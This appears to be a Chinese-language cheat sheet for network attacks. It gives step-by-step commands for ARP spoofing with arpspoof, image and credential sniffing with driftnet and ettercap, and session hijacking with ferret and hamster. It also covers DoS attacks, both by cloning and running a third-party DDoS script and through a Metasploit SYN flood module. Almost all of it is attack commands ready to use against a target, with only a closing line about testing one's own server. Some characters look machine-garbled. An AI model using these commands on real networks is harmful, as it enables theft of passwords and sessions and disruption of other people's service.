arp攻擊
必要内容
安裝arpspoof檔案
apt-get install dsniff
1.檢查以及擷取網段
即檢視區域網路存活主機
fping -asg 192.168.1.1/24
或者-->nmap -sP ip
掃描常用的端口-->nmap -F -sT -v nmap.org
注意點:
①攻擊者的IP和被攻擊者的IP需要在同一個網段中(即需要兩個ip段可以連接配接ping通)
②預設的網卡必須是eth0
–>如
2.攻擊方法
echo 1 >/proc/sys/net/ipv4/ip_forward
#即開啟端口轉發功能
arpspoof -i eth0 -t 192.168.1.1 192.168.1.104
#即 前面的IP是靶機的IP,後面的IP是攻擊者的ip 即将該ip欺騙到其他上面的狀況特點-->斷網攻擊
#arpspoof -i 網卡 -t 網關 目标IP
driftnet -i eth0
#竊取受害者的圖檔
ettercap -Tq -i eth0
#ettercap -i 網卡 -Tq -M
#進行賬号密碼嗅探-->即抓取賬号密碼狀況特點
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安裝)
hamster
http://hamster
#session劫持
即arpspoo攻擊成功後進行嗅探密碼的狀況特點
DOS/DDOS攻擊
方法1
①安裝ddos攻擊子產品
git clone https://github.com/Ha3MrX/DDos-Attack
②進入DDos-Attack且運作檔案
cd DDos-Attack
ls
python ddos-attack.py
③輸入目标的ip以及端口即可以進行攻擊
方法2
利用Metasploit子產品進行實作
#進入msf子產品中
msfconsole
#進入潮汐攻擊目錄
use auxiliary/dos/tcp/synflood
set rhost 目标伺服器
#執行
exploit
如 把自己的伺服器拿來做測試做的一個小的攻擊